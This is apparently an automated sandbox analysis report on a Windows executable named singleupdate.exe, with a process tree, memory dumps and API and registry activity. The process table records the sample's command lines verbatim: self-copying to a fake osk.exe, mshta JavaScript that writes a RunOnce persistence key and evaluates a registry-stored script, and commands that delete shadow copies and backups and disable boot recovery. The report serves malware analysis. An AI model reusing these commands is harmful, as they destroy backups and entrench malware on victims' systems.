3e4f8a15...7f8a

Monitored Processes

Process Overview

ID	PID	Monitor Reason	Integrity Level	Image Name	Command Line	Origin ID
#1	0xfa0	Analysis Target	High (Elevated)	singleupdate.exe	"C:\Users\FD1HVy\Desktop\singleupdate.exe"	-
#2	0xa8c	Child Process	High (Elevated)	cmd.exe	"C:\WINDOWS\system32\cmd.exe" /c copy /y "C:\Users\FD1HVy\Desktop\singleupdate.exe" "C:\Users\FD1HVy\AppData\Roaming\osk.exe"	#1
#5	0xe64	Child Process	High (Elevated)	singleupdate.exe	"C:\Users\FD1HVy\Desktop\singleupdate.exe" runas	#1
#6	0xfb4	Child Process	High (Elevated)	cmd.exe	"C:\WINDOWS\system32\cmd.exe" /c copy /y "C:\Users\FD1HVy\Desktop\singleupdate.exe" "C:\Users\FD1HVy\AppData\Roaming\osk.exe"	#5
#8	0x6cc	Child Process	High (Elevated)	osk.exe	"C:\Users\FD1HVy\AppData\Roaming\osk.exe"	#5
#9	0xfe4	Child Process	High (Elevated)	mshta.exe	mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('singleupdate.exe');close()}catch(e){}},10);"	#5
#10	0xd00	Child Process	High (Elevated)	mshta.exe	mshta.exe "javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\shwlwook',i);}catch(e){}},10);"	#8
#11	0xec8	Child Process	High (Elevated)	mshta.exe	mshta.exe "javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\CADHC\\SH[YU'));close();"	#8
#12	0xfb0	Child Process	High (Elevated)	cmd.exe	"C:\Windows\System32\cmd.exe" /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0	#11
#13	0x868	Child Process	High (Elevated)	cmd.exe	"C:\Windows\System32\cmd.exe" /c wmic SHADOWCOPY DELETE	#11
#15	0xf28	Child Process	High (Elevated)	cmd.exe	"C:\Windows\System32\cmd.exe" /c vssadmin Delete Shadows /All /Quiet	#11
#17	0x4a4	Child Process	High (Elevated)	cmd.exe	"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No	#11
#20	0x344	Child Process	High (Elevated)	cmd.exe	"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy ignoreallfailures	#11
#22	0xdb4	Child Process	High (Elevated)	wmic.exe	wmic SHADOWCOPY DELETE	#13
#23	0x7b4	Child Process	High (Elevated)	vssadmin.exe	vssadmin Delete Shadows /All /Quiet	#15

Behavior Information - Grouped by Category

Process #1: singleupdate.exe

2559

Information	Value
ID	#1
File Name	c:\users\fd1hvy\desktop\singleupdate.exe
Command Line	"C:\Users\FD1HVy\Desktop\singleupdate.exe"
Initial Working Directory	C:\Users\FD1HVy\Desktop\
Monitor	Start Time: 00:02:09, Reason: Analysis Target
Unmonitor	End Time: 00:03:06, Reason: Self Terminated
Monitor Duration	00:00:56

OS Process Information

Information	Value
PID	0xfa0
Parent PID	0x860 (c:\windows\explorer.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	NQDPDE\FD1HVy
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 720 0x E5C 0x 210 0x BEC 0x B08 0x A70 0x FC8 0x E38 0x 4F0

Memory Dumps

Name	Start VA	End VA	Dump Reason	PE Rebuilds	Bitness	Entry Points	Actions
buffer	0x02200000	0x02207FFF	First Execution	-	32-bit	0x02201540, 0x02200000	... Region Actions Download Dump
buffer	0x02150000	0x02150FFF	First Execution	-	32-bit	0x02150000	... Region Actions Download Dump
buffer	0x02200000	0x02207FFF	Content Changed	-	32-bit	0x02205844, 0x022030F4	... Region Actions Download Dump
buffer	0x02200000	0x02207FFF	Content Changed	-	32-bit	0x02204CB4	... Region Actions Download Dump
singleupdate.exe	0x00400000	0x004BFFFF	Marked Writable	-	32-bit	-	... Region Actions Download Dump
singleupdate.exe	0x00400000	0x004BFFFF	Content Changed	-	32-bit	0x00401110	... Region Actions Download Dump Go to AV Match
singleupdate.exe	0x00400000	0x004BFFFF	Content Changed	-	32-bit	0x0040EB38, 0x0040F130	... Region Actions Download Dump Go to AV Match
singleupdate.exe	0x00400000	0x004BFFFF	Content Changed	-	32-bit	0x0040B764	... Region Actions Download Dump
singleupdate.exe	0x00400000	0x004BFFFF	Content Changed	-	32-bit	0x00417D3C	... Region Actions Download Dump
singleupdate.exe	0x00400000	0x004BFFFF	Content Changed	-	32-bit	0x00410838	... Region Actions Download Dump
singleupdate.exe	0x00400000	0x004BFFFF	Content Changed	-	32-bit	0x00413074	... Region Actions Download Dump
singleupdate.exe	0x00400000	0x004BFFFF	Content Changed	-	32-bit	0x0042A5C8	... Region Actions Download Dump
singleupdate.exe	0x00400000	0x004BFFFF	Content Changed	-	32-bit	0x0042B67C, 0x0042CC58	... Region Actions Download Dump
singleupdate.exe	0x00400000	0x004BFFFF	Content Changed	-	32-bit	0x00423564, 0x00429864	... Region Actions Download Dump
singleupdate.exe	0x00400000	0x004BFFFF	Content Changed	-	32-bit	0x00414000	... Region Actions Download Dump
singleupdate.exe	0x00400000	0x004BFFFF	Content Changed	-	32-bit	0x00420000, 0x0041FA70, ...	... Region Actions Download Dump
singleupdate.exe	0x00400000	0x004BFFFF	Content Changed	-	32-bit	0x00426B84	... Region Actions Download Dump
singleupdate.exe	0x00400000	0x004BFFFF	Process Termination	-	32-bit	-	... Region Actions Download Dump

Host Behavior

COM (1)

Operation	Class	Interface	Additional Information	Success	Count	Logfile
Create	BCDE0395-E52F-467C-8E3D-C4579291692E	A95664D2-9614-4F35-A746-DE8DB63617E6	cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER		1	Fn

File (569)

Operation	Filename	Additional Information	Count	Logfile
Create	g	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ	249	Fn
Create	-	share_mode = FILE_SHARE_READ, FILE_SHARE_DELETE	1	Fn
Get Info	System Paging File	type = size	249	Fn
Open	STD_INPUT_HANDLE	-	1	Fn
Open	STD_OUTPUT_HANDLE	-	68	Fn
Open	STD_ERROR_HANDLE	-	1	Fn

Registry (4)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Borland\Locales	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Borland\Locales	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\shwlwook	-	1	Fn

Process (2)

Operation	Process	Additional Information	Success	Count	Logfile
Create	C:\WINDOWS\system32\cmd.exe	os_pid = 0xa8c, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE		1	Fn
Create	C:\Users\FD1HVy\Desktop\singleupdate.exe	show_window = SW_SHOWNORMAL		1	Fn

Module (772)

Operation	Module	Additional Information	Count	Logfile
Load	api-ms-win-core-synch-l1-2-0	base_address = 0x74ea0000	2	Fn
Load	api-ms-win-core-fibers-l1-1-1	base_address = 0x74ea0000	2	Fn
Load	api-ms-win-core-localization-l1-2-1	base_address = 0x74ea0000	1	Fn
Load	kernel32	base_address = 0x75e90000	1	Fn
Load	api-ms-win-core-string-l1-1-0	base_address = 0x74ea0000	1	Fn
Load	api-ms-win-core-datetime-l1-1-1	base_address = 0x74ea0000	1	Fn
Load	api-ms-win-core-localization-obsolete-l1-2-0	base_address = 0x74ea0000	1	Fn
Load	oleaut32.dll	base_address = 0x75bb0000	2	Fn
Load	advapi32.dll	base_address = 0x761b0000	2	Fn
Load	user32.dll	base_address = 0x74b70000	2	Fn
Load	kernel32.dll	base_address = 0x75e90000	4	Fn
Load	wininet.dll	base_address = 0x73070000	1	Fn
Load	shell32.dll	base_address = 0x76480000	3	Fn
Load	C:\Users\FD1HVy\Desktop\singleupdate.ENU	base_address = 0x0	1	Fn
Load	C:\Users\FD1HVy\Desktop\singleupdate.EN	base_address = 0x0	1	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x75e90000	2	Fn
Get Handle	c:\windows\syswow64\ntdll.dll	base_address = 0x77bb0000	7	Fn
Get Handle	c:\windows\syswow64\advapi32.dll	base_address = 0x761b0000	2	Fn
Get Handle	c:\users\fd1hvy\desktop\singleupdate.exe	base_address = 0x400000	1	Fn
Get Handle	c:\windows\syswow64\oleaut32.dll	base_address = 0x75bb0000	1	Fn
Get Filename	-	process_name = c:\users\fd1hvy\desktop\singleupdate.exe, file_name_orig = C:\Users\FD1HVy\Desktop\singleupdate.exe, size = 261	2	Fn
Get Filename	c:\users\fd1hvy\desktop\singleupdate.exe	process_name = c:\users\fd1hvy\desktop\singleupdate.exe, file_name_orig = C:\Users\FD1HVy\Desktop\singleupdate.exe, size = 261	1	Fn
Get Filename	C:\Users\FD1HVy\Desktop\singleupdate.EN	process_name = c:\users\fd1hvy\desktop\singleupdate.exe, file_name_orig = C:\Users\FD1HVy\Desktop\singleupdate.exe, size = 522	2	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	address_out = 0x74f97060	1	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = FlsAlloc, address_out = 0x74f9bea0	2	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = FlsSetValue, address_out = 0x74f92550	2	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = InitializeCriticalSectionEx, address_out = 0x74f97060	1	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = FlsGetValue, address_out = 0x74f870c0	2	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = LCMapStringEx, address_out = 0x74f7ed00	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = AreFileApisANSI, address_out = 0x75ea4280	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsAlloc, address_out = 0x75ea4ae0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsFree, address_out = 0x75ea4b00	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsGetValue, address_out = 0x75ea4b20	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsSetValue, address_out = 0x75ea4b40	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSectionEx, address_out = 0x75efebc0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitOnceExecuteOnce, address_out = 0x74f95550	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventExW, address_out = 0x75efeb20	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSemaphoreW, address_out = 0x75efeb90	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSemaphoreExW, address_out = 0x75efeb80	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolTimer, address_out = 0x75ea6d30	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadpoolTimer, address_out = 0x77bfd7c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForThreadpoolTimerCallbacks, address_out = 0x77bfb840	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolTimer, address_out = 0x77bfb740	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolWait, address_out = 0x75ea6d70	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadpoolWait, address_out = 0x77bfc0b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolWait, address_out = 0x77bfbe10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushProcessWriteBuffers, address_out = 0x77c22b20	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibraryWhenCallbackReturns, address_out = 0x77c18e50	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessorNumber, address_out = 0x77c152f0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSymbolicLinkW, address_out = 0x75ea4510	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentPackageId, address_out = 0x74f9e260	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount64, address_out = 0x75ea0db0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileInformationByHandleEx, address_out = 0x75ea43d0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileInformationByHandle, address_out = 0x75eff110	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemTimePreciseAsFileTime, address_out = 0x75eff1e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeConditionVariable, address_out = 0x77c13a00	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WakeConditionVariable, address_out = 0x77c88c50	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WakeAllConditionVariable, address_out = 0x77c18a90	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SleepConditionVariableCS, address_out = 0x7500fca0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeSRWLock, address_out = 0x77c13a00	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = AcquireSRWLockExclusive, address_out = 0x77bf58e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TryAcquireSRWLockExclusive, address_out = 0x77c72ce0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReleaseSRWLockExclusive, address_out = 0x77bf83a0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SleepConditionVariableSRW, address_out = 0x7500fcf0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolWork, address_out = 0x75ea6db0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SubmitThreadpoolWork, address_out = 0x77bfeb00	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolWork, address_out = 0x77bfed50	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CompareStringEx, address_out = 0x75ea7050	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLocaleInfoEx, address_out = 0x75ea7190	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LCMapStringEx, address_out = 0x75ea7480	1	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = CompareStringEx, address_out = 0x74f62c20	1	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = EnumSystemLocalesEx, address_out = 0x74f63a60	1	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = GetDateFormatEx, address_out = 0x74fd9b40	1	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = GetLocaleInfoEx, address_out = 0x74f8f170	1	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = GetTimeFormatEx, address_out = 0x74fd9e10	1	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = GetUserDefaultLocaleName, address_out = 0x74f94220	1	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = IsValidLocaleName, address_out = 0x74f8ed60	1	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = LCIDToLocaleName, address_out = 0x74f8da50	1	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = LocaleNameToLCID, address_out = 0x74f6bac0	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = memcpy, address_out = 0x77c27b00	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SysFreeString, address_out = 0x75bcb920	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SysReAllocStringLen, address_out = 0x75bd1500	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SysAllocStringLen, address_out = 0x75bcb7e0	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegQueryValueExA, address_out = 0x761cf020	2	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegOpenKeyExA, address_out = 0x761cf210	2	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCloseKey, address_out = 0x761ced60	2	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetKeyboardType, address_out = 0x74be8d80	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DestroyWindow, address_out = 0x74ba3160	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = LoadStringA, address_out = 0x74b8d7b0	2	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MessageBoxA, address_out = 0x74bdd740	2	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharNextA, address_out = 0x74b8bf60	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetACP, address_out = 0x75ea4ca0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Sleep, address_out = 0x75ea6760	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualFree, address_out = 0x75ea69d0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAlloc, address_out = 0x75ea6970	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount, address_out = 0x75efdd50	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = QueryPerformanceCounter, address_out = 0x75ea5da0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThreadId, address_out = 0x75ea8820	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualQuery, address_out = 0x75ea6a70	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WideCharToMultiByte, address_out = 0x75ea6b10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MultiByteToWideChar, address_out = 0x75ea5c40	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrlenA, address_out = 0x75ea6c50	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpynA, address_out = 0x75ea6c10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryExA, address_out = 0x75ea5aa0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetThreadLocale, address_out = 0x75ea5600	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStartupInfoA, address_out = 0x75ee28e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcAddress, address_out = 0x75ea51b0	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleA, address_out = 0x75ea50b0	3	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameA, address_out = 0x75ea5070	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLocaleInfoA, address_out = 0x75ea5020	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCommandLineA, address_out = 0x75ea4cb0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibrary, address_out = 0x75ea4c40	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstFileA, address_out = 0x75efedb0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindClose, address_out = 0x75efed70	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExitProcess, address_out = 0x75ea3cb0	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThread, address_out = 0x75ea46b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteFile, address_out = 0x75eff180	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = UnhandledExceptionFilter, address_out = 0x75ea68d0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RtlUnwind, address_out = 0x75ea7c10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RaiseException, address_out = 0x75ea5e20	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStdHandle, address_out = 0x75ea5330	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsSetValue, address_out = 0x75ea6870	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsGetValue, address_out = 0x75ea6850	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalAlloc, address_out = 0x75ea5b20	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = TranslateMessage, address_out = 0x74b9f900	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = SystemParametersInfoW, address_out = 0x74b9f210	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PeekMessageA, address_out = 0x74b887a0	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetSystemMetrics, address_out = 0x74b9ddc0	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetLastInputInfo, address_out = 0x74b8bd10	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DispatchMessageA, address_out = 0x74b8fd80	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharNextW, address_out = 0x74ba1130	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharLowerBuffW, address_out = 0x74b934a0	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharLowerBuffA, address_out = 0x74be75b0	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharUpperBuffA, address_out = 0x74be7650	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharToOemA, address_out = 0x74bdf020	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WinExec, address_out = 0x75ee2b00	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForSingleObject, address_out = 0x75efeca0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TerminateProcess, address_out = 0x75ea67e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SizeofResource, address_out = 0x75ea6740	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileTime, address_out = 0x75eff140	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointer, address_out = 0x75eff120	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileAttributesW, address_out = 0x75eff100	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetEndOfFile, address_out = 0x75eff0e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadFile, address_out = 0x75eff090	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenProcess, address_out = 0x75ea5cc0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenMutexA, address_out = 0x75ede030	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MoveFileW, address_out = 0x75ede500	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LockResource, address_out = 0x75ea5bc0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadResource, address_out = 0x75ea5b00	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryA, address_out = 0x75ea5a80	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LeaveCriticalSection, address_out = 0x77bfb250	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSection, address_out = 0x77c0af20	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalUnlock, address_out = 0x75ee44e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalReAlloc, address_out = 0x75ee3f90	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalHandle, address_out = 0x75ee4420	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalLock, address_out = 0x75ee42f0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalFree, address_out = 0x75ea1ee0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalAlloc, address_out = 0x75ea5750	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersionExA, address_out = 0x75ea56d0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameW, address_out = 0x75ea5090	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLocalTime, address_out = 0x75ea5060	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLastError, address_out = 0x75ea5010	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileAttributesA, address_out = 0x75efeee0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetEnvironmentVariableA, address_out = 0x75ea4f90	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDiskFreeSpaceA, address_out = 0x75efee80	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDateFormatA, address_out = 0x75ea76e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCommandLineW, address_out = 0x75ea4cc0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCPInfo, address_out = 0x75ea4d10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeResource, address_out = 0x75ea4c80	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FormatMessageA, address_out = 0x75ea4bc0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindResourceA, address_out = 0x75ee27c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextFileW, address_out = 0x75efee40	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstFileW, address_out = 0x75efedf0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FileTimeToLocalFileTime, address_out = 0x75efed60	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FileTimeToDosDateTime, address_out = 0x75ee1eb0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumCalendarInfoA, address_out = 0x75ebc0d0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnterCriticalSection, address_out = 0x77bfb2d0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteFileW, address_out = 0x75efed40	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteCriticalSection, address_out = 0x77bdfb90	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessW, address_out = 0x75ea4610	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessA, address_out = 0x75ea45b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreatePipe, address_out = 0x75ea4590	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateMutexA, address_out = 0x75efeb40	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileW, address_out = 0x75efed10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CompareStringA, address_out = 0x75ea4410	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseHandle, address_out = 0x75efeab0	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegSetValueExA, address_out = 0x761cffc0	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegEnumValueA, address_out = 0x761d1940	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegEnumKeyExA, address_out = 0x761d1960	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegDeleteValueA, address_out = 0x761d07a0	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegDeleteKeyA, address_out = 0x761cf8c0	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCreateKeyExA, address_out = 0x761cf560	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetReadFile, address_out = 0x731a3a70	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenUrlA, address_out = 0x7326e8c0	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenA, address_out = 0x7318f1a0	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetCloseHandle, address_out = 0x7317d000	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteW, address_out = 0x765e42e0	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetSpecialFolderLocation, address_out = 0x765e3790	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetPathFromIDListW, address_out = 0x7658bda0	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetMalloc, address_out = 0x765edf80	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArrayPtrOfIndex, address_out = 0x75bd6670	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArrayGetUBound, address_out = 0x75bd5460	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArrayGetLBound, address_out = 0x75bd5ea0	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArrayCreate, address_out = 0x75bd0340	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VariantChangeType, address_out = 0x75bca5e0	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VariantCopy, address_out = 0x75be9dc0	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VariantClear, address_out = 0x75be9db0	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VariantInit, address_out = 0x75be9de0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDiskFreeSpaceExA, address_out = 0x75efee90	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VariantChangeTypeEx, address_out = 0x75bca610	1	Fn
